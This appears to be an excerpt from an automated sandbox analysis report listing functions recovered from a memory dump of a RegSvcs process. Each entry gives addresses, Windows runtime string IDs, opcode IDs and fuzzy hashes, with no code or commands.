                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                  • API String ID: 0-4066393604
                                                                  • Opcode ID: 3f81c73c8900e982671b4ccf28721e8c5a26cb59961be2a403d8ddcc3822bf02
                                                                  • Instruction ID: 5c0f6e5504449c53e1bb4e5b66e8e07637531d21128b39801350924d258cd420
                                                                  • Opcode Fuzzy Hash: 3f81c73c8900e982671b4ccf28721e8c5a26cb59961be2a403d8ddcc3822bf02
                                                                  • Instruction Fuzzy Hash: 9EE16B71A01219ABEF22CEDDCD94BAEBBBEBB04314F10452AEA01E7355D778D941CB50
                                                                  Function 0175A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `$`
                                                                  • API String ID: 0-197956300
                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                  • Instruction ID: d5c6a89dbab99935756f3c8ee699fa59f769881a405d87ff1edc16f4cd0950b3
                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                  • Instruction Fuzzy Hash: EFC1CF312043429BEB65CE28C844B6BFBE5EFC4318F184A3DFA968B291D7B5D505CB91
                                                                  Function 0170E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: fdaa9c75a270def354991789310987399072ae80e635758170382edf705699c2
                                                                  • Instruction ID: 7fe94029a7ef846abe1824286db86367884db8ed360f9f88746039f64132d331
                                                                  • Opcode Fuzzy Hash: fdaa9c75a270def354991789310987399072ae80e635758170382edf705699c2
                                                                  • Instruction Fuzzy Hash: AF613C71E44309DFDB15DFA88840AAEFBF9FB44704F14486EE649EB291DB31A940CB50
                                                                  Function 017343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$MUI
                                                                  • API String ID: 0-17815947
                                                                  • Opcode ID: d0fa7fe7be17ba7b448e8595b91a4e1ab2923f9d2306cffb70130ebf7399cffc
                                                                  • Instruction ID: 32ff261eea89696f0778cfeaf0fa097e1c69bde748ab4e43982d48875cc25d47
                                                                  • Opcode Fuzzy Hash: d0fa7fe7be17ba7b448e8595b91a4e1ab2923f9d2306cffb70130ebf7399cffc
                                                                  • Instruction Fuzzy Hash: 5E5136B1E0021DAFDF11DFA9CC90AEEBBBDEB44754F100529E612A7281D7349E05CBA4
                                                                  Function 016904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • kLsE, xrefs: 01690540
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0169063D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  • API String ID: 0-2547482624
                                                                  • Opcode ID: 2c51eafffa95cfbbe49ab2be01db7683034bdb9888c7b3e90c5679f45a8bbfa7
                                                                  • Instruction ID: e5271b5c335340c6bdac605c278326cad85d43a1bbbe82bb7462350c3399b307
                                                                  • Opcode Fuzzy Hash: 2c51eafffa95cfbbe49ab2be01db7683034bdb9888c7b3e90c5679f45a8bbfa7
                                                                  • Instruction Fuzzy Hash: 1B51D1715047429FDB24DF68C9406A7BBEDAF85314F10883EFAAA87341E730E545CB92
                                                                  Function 0169A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0169A309
                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0169A2FB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                  • API String ID: 0-2876891731
                                                                  • Opcode ID: 1351b76254acddbb6fe45355e4a2ba4f185c572bd226f3d8063bc778faf1d706
                                                                  • Instruction ID: e215eda1c13f9ac9ff06619fcd7edce7140ed81f6b1b1f8d4ddbde46112b7379
                                                                  • Opcode Fuzzy Hash: 1351b76254acddbb6fe45355e4a2ba4f185c572bd226f3d8063bc778faf1d706
                                                                  • Instruction Fuzzy Hash: F9418B31A04649DBDF118F99CC50B6ABBF9BF84718F1440A9EA00DB395E3B5D901CB90
                                                                  Function 016CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Cleanup Group$Threadpool!
                                                                  • API String ID: 2994545307-4008356553
                                                                  • Opcode ID: 20278d2707c769e7c72498d3db29ed38a287f1b50f885d744d447fb7d07665c0
                                                                  • Instruction ID: 6f57c84641e6255b632f652371f3b3ef508ab1b84894c7864be05602f91e0041
                                                                  • Opcode Fuzzy Hash: 20278d2707c769e7c72498d3db29ed38a287f1b50f885d744d447fb7d07665c0
                                                                  • Instruction Fuzzy Hash: AC01DCB2250788AFD321DF64CD46B2677E8EB84B29F00893DB649C7190E334E804CB4A
                                                                  Function 0169C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  • API String ID: 0-1339004836
                                                                  • Opcode ID: 646bc1d98bc4b9da9c3e728e6a6e893ae09cf88d13ff6b6cb612d537f4e0df3a
                                                                  • Instruction ID: e6acdec57e2ff9309f2497ab6b64b27836711d64160e60d164f7b569e66f9fbb
                                                                  • Opcode Fuzzy Hash: 646bc1d98bc4b9da9c3e728e6a6e893ae09cf88d13ff6b6cb612d537f4e0df3a
                                                                  • Instruction Fuzzy Hash: 95825975E002198BEF25CFA9CD80BEDBBB9BF48710F14816AD919AB391D7309942CB54
                                                                  Function 01716420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 0ae6ddc5283042371fd9a6a987b3163f50a11f10332c96c1d8dab02f12e3d1d7
                                                                  • Instruction ID: 99c514e6b498341d65a64a2e6fe0893d61d9014735cbc7d3a247978eb79dab08
                                                                  • Opcode Fuzzy Hash: 0ae6ddc5283042371fd9a6a987b3163f50a11f10332c96c1d8dab02f12e3d1d7
                                                                  • Instruction Fuzzy Hash: AE917471A41219AFEB21DF99CC85FEEBBB9EF14B50F100069F601AB294D774AD40CB64
                                                                  Function 0173E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 12070a653813ced6f4970ede5b65196e0db168a9cf34d9b9a94cf1f860865881
                                                                  • Instruction ID: 22e10cb33a95689dc2d6d28ac3eda50e252ccae4895dc25277918af7b856f204
                                                                  • Opcode Fuzzy Hash: 12070a653813ced6f4970ede5b65196e0db168a9cf34d9b9a94cf1f860865881
                                                                  • Instruction Fuzzy Hash: FF919D72901619BEDB22AFA5DC84FEFFB7AEF85740F100029F501A7252EB749941CB94
                                                                  Function 016CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  • Opcode ID: cb7fa9e17b2945500c541e0719a2918986558a34ac69a8e87998cb6d3cb124d1
                                                                  • Instruction ID: c7485ab274482b87f0480684f5023679a3f787704a97ebf4403bc4913d701ed8
                                                                  • Opcode Fuzzy Hash: cb7fa9e17b2945500c541e0719a2918986558a34ac69a8e87998cb6d3cb124d1
                                                                  • Instruction Fuzzy Hash: 33716DB5E0031ADBDF29CF98C9A06ADBBF2BF48710F14816EF505A7281E7319951CB64
                                                                  Function 01734978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .mui
                                                                  • API String ID: 0-1199573805
                                                                  • Opcode ID: 8641760a6529934546ee19808d51ed8b1755c39242d1677a94fc48c8e6961ecf
                                                                  • Instruction ID: 7e1fe8e82f5d023a15e5252ff714aec25215a5ab47a39b07ebec5f45e48fafb8
                                                                  • Opcode Fuzzy Hash: 8641760a6529934546ee19808d51ed8b1755c39242d1677a94fc48c8e6961ecf
                                                                  • Instruction Fuzzy Hash: 4151B572D0022A9BDF18DF99D840AAEFBB9BF44650F05416DE912BB211D3349D02CBE4
                                                                  Function 016AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EXT-
                                                                  • API String ID: 0-1948896318
                                                                  • Opcode ID: 36eda19c6d0edf23a0a4efccbcbc7b49f1072f59efc210e64c820fb902067950
                                                                  • Instruction ID: a81502238cdc4f675fd56692388ff7a6ac662299510086bbc1964183cd1efcde
                                                                  • Opcode Fuzzy Hash: 36eda19c6d0edf23a0a4efccbcbc7b49f1072f59efc210e64c820fb902067950
                                                                  • Instruction Fuzzy Hash: 1F41A172508312ABD710DA79CD80B6BBBE9AF88714F84092DFA85D7240E775DD04CBA7
                                                                  Function 0170C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  • Opcode ID: a89a2e53a9779c3a55b41baa5727377a450232f0cafb4dd3ae6bc9e043c8a664
                                                                  • Instruction ID: d8476b6733601dacf805ce9b472d25a00c970d2d8f4325f42fc6e1b9707522cd
                                                                  • Opcode Fuzzy Hash: a89a2e53a9779c3a55b41baa5727377a450232f0cafb4dd3ae6bc9e043c8a664
                                                                  • Instruction Fuzzy Hash: BE4148B1D4162DEBDB22DA50CC84FDEB77DAB45714F0045E9A708A7180DB709E498F98
                                                                  Function 01726B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #
                                                                  • API String ID: 0-1885708031
                                                                  • Opcode ID: 25642b00a23b59ac94351eaf08f4676d7e20e1c7a56597290f776fb2ca952093
                                                                  • Instruction ID: fcf4476592b2f00bafcf701cd71d22c90361e7e8eac96f6bd239fbedcf4ac9ed
                                                                  • Opcode Fuzzy Hash: 25642b00a23b59ac94351eaf08f4676d7e20e1c7a56597290f776fb2ca952093
                                                                  • Instruction Fuzzy Hash: 68311A31E007699BDB22EB69CC50BAEFBA9DF04704F54406AFD41AB282C775EC46CB54
                                                                  Function 0170CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryName
                                                                  • API String ID: 0-215506332
                                                                  • Opcode ID: 9e738dab6f05ead95455da2d533c8db33272acb59ccaa1df48bb56dad9687717
                                                                  • Instruction ID: 1f92b5fa85ae3d61aea8cf0fe846ed89b81444d853a9b26f3f6d8be9b61b97d8
                                                                  • Opcode Fuzzy Hash: 9e738dab6f05ead95455da2d533c8db33272acb59ccaa1df48bb56dad9687717
                                                                  • Instruction Fuzzy Hash: 60310576900A15EFEB17DA58C851E6FFBB5EB80710F0142A9AA01A7290D730DE00EBE0
                                                                  Function 0171892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0171895E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                  • API String ID: 0-702105204
                                                                  • Opcode ID: c316a3195a72910c62ff5561a27a92a1f673553034b6a7e3365a5610df43ec6a
                                                                  • Instruction ID: c870ebfc722b7303fc1ca0583a9038838c4fefd13b4ea899643450ec9e82c9b9
                                                                  • Opcode Fuzzy Hash: c316a3195a72910c62ff5561a27a92a1f673553034b6a7e3365a5610df43ec6a
                                                                  • Instruction Fuzzy Hash: 0A012B723442019BE7206F5DCC84A6AFF67EF81A64B14042CF7810A159CF206881C797
                                                                  Function 01732000 Relevance: .8, Instructions: 757COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01a3154353f73855eb58bfd85d7c3bab180c9c4d6131cf4f5248402fa281fe5c
                                                                  • Instruction ID: 07a981f79cdda1011bbc6bf05090e4dd23ac7c4f96512cee0a8b01670d7c7313
                                                                  • Opcode Fuzzy Hash: 01a3154353f73855eb58bfd85d7c3bab180c9c4d6131cf4f5248402fa281fe5c
                                                                  • Instruction Fuzzy Hash: 4442CF326083419BE725CF68C890A6BFBE6BFC8700F58492DFA8297253D771D945CB52
                                                                  Function 01728158 Relevance: .6, Instructions: 617COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b15b1b705d924ecddc28320a7b0fdb31630204ff2b486ab7906a9f6cd7c72daa
                                                                  • Instruction ID: eb7ea401c292e5d96abec1ecd89a44649dcca506fe11d6ed7a5c21868e25cef0
                                                                  • Opcode Fuzzy Hash: b15b1b705d924ecddc28320a7b0fdb31630204ff2b486ab7906a9f6cd7c72daa
                                                                  • Instruction Fuzzy Hash: D9425C75E102298FEB24CF69CC81BADFBF6BF48300F148199E949AB242D7359985CF51
                                                                  Function 016A2840 Relevance: .6, Instructions: 605COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 716da21fb7022a68770f50926b5772d03fe8e2cd2613bb9187ee7ba392aa3902
                                                                  • Instruction ID: 78231c954e35183cf2df6a6ca231945e1cdee427cae5914b82657034884434df
                                                                  • Opcode Fuzzy Hash: 716da21fb7022a68770f50926b5772d03fe8e2cd2613bb9187ee7ba392aa3902
                                                                  • Instruction Fuzzy Hash: C232BB70A007568BEB25CF69CC587BEBBF2BF84704F24811DE6969B385D735A842CB50
                                                                  Function 0173A118 Relevance: .6, Instructions: 591COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b0c3f36e4fdf9a384d756abd55b0a3d40f698102ff53c4a86216723402194b00
                                                                  • Instruction ID: 05cc3639b88b8c6013c042b7811a76be687ceff7fcfc439562031383907c3bd0
                                                                  • Opcode Fuzzy Hash: b0c3f36e4fdf9a384d756abd55b0a3d40f698102ff53c4a86216723402194b00
                                                                  • Instruction Fuzzy Hash: 8F22A9702046618AEB25CF2DC096772FBF1AFC5300F18849AE9D6CB287E735E452DB61
                                                                  Function 01696A50 Relevance: .5, Instructions: 548COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b046ce1ff8723df663ac2d264a9a2b8aecb027ffbba473e333ef34391e725ff9
                                                                  • Instruction ID: b126ff84f776f108e85f3fbe08c6f0c9232d9f05b27943101bb1e0d1f8a611f6
                                                                  • Opcode Fuzzy Hash: b046ce1ff8723df663ac2d264a9a2b8aecb027ffbba473e333ef34391e725ff9
                                                                  • Instruction Fuzzy Hash: D7327C71A05205CFDB25CFA8C880AAABBF6FF48310F14856EEA55AB355D734E846CB50
                                                                  Function 016B4A35 Relevance: .4, Instructions: 423COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                  • Instruction ID: 78155a078b755f1654daebe411956c2228b72904d2ddd1ac8a8e4a39314ea181
                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                  • Instruction Fuzzy Hash: 14F15071E0021A9BDB15CF99CD90BEEBBF5AF48710F09816DEA06AB345DB74D881CB50
                                                                  Function 0172892B Relevance: .4, Instructions: 386COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: facfbd87e2b9901a66b0fcb69a10708709f9a08a26b9821dd2d086dd89bcc30b
                                                                  • Instruction ID: 87f254a942d51f1aa6427d7ca80d9cb9704a5ba4145d844a5c237f3c176ea6bc
                                                                  • Opcode Fuzzy Hash: facfbd87e2b9901a66b0fcb69a10708709f9a08a26b9821dd2d086dd89bcc30b
                                                                  • Instruction Fuzzy Hash: E3D1F471E0062A8BDF15CF58C841AFEF7F2BF88304F18816AD955A7241D736EA06CB61
                                                                  Function 016965D0 Relevance: .4, Instructions: 383COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a8e11d41b8eb0deee4357c447960e2e7193bb0b7e0c2fbe9d68cc00d3dceae7
                                                                  • Instruction ID: 938e003fd4d50e21acef1162a2e3f764fd41e1b8c9aca44245e9b3813f5af6c7
                                                                  • Opcode Fuzzy Hash: 9a8e11d41b8eb0deee4357c447960e2e7193bb0b7e0c2fbe9d68cc00d3dceae7
                                                                  • Instruction Fuzzy Hash: 7FE1B271508342CFCB15CF28C890A6ABBE5FF89318F05896DF9998B351DB31E905CB92
                                                                  Function 01688397 Relevance: .4, Instructions: 380COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d725291432ffecdc11bce2c8d8b2e9d63fcb690b436649aa1b76a331e48f3b15
                                                                  • Instruction ID: a977f82538e94beac437046ad7ca2afede44b5861f6f84238365efa965831959
                                                                  • Opcode Fuzzy Hash: d725291432ffecdc11bce2c8d8b2e9d63fcb690b436649aa1b76a331e48f3b15
                                                                  • Instruction Fuzzy Hash: 69D1F272A012169BDB14EF68CC90ABEB7FABF54304F45472DE916DB280E734E951CB60
                                                                  Function 01718243 Relevance: .3, Instructions: 322COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                  • Instruction ID: 42bbf4d7972eb4ad8a33087d2cb690492322df1e4354e677e7f2afcda986a125
                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                  • Instruction Fuzzy Hash: 6AB19075A00605AFDB25DF9CC940FABFBBAFF84304F14456DAA02A7798DA34E905CB11
                                                                  Function 016A0535 Relevance: .3, Instructions: 300COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                  • Instruction ID: d51a2497c24c70de87323d9abca5387e782b1847319a997363337a12526d142c
                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                  • Instruction Fuzzy Hash: 89B1F271600646AFDB25DBACCD50BBEBBF6AF84304F540199E6969B381DB30ED41CB90
                                                                  Function 016983C0 Relevance: .3, Instructions: 281COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e61c8af72a047ba8d3e71155015419dd0e7aa6dd4366815577482ef3e2ea0463
                                                                  • Instruction ID: 258daa9a0b23cb47f4b260270787f2a24f428995705b3330f2da73f15dd4d626
                                                                  • Opcode Fuzzy Hash: e61c8af72a047ba8d3e71155015419dd0e7aa6dd4366815577482ef3e2ea0463
                                                                  • Instruction Fuzzy Hash: 07C15770208345CFDB64CF19C884BAAB7E9BF89744F44492DEA8987391D774E909CF92
                                                                  Function 0168C427 Relevance: .3, Instructions: 280COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8321425cfbba4a9938df06b4b05e1ca4a6e6f9071e438c794eb79073bb4e07dc
                                                                  • Instruction ID: 3bb322f386d0d57cd442eec033e2f1e6207e2417553511fe52c10b1857c9646e
                                                                  • Opcode Fuzzy Hash: 8321425cfbba4a9938df06b4b05e1ca4a6e6f9071e438c794eb79073bb4e07dc
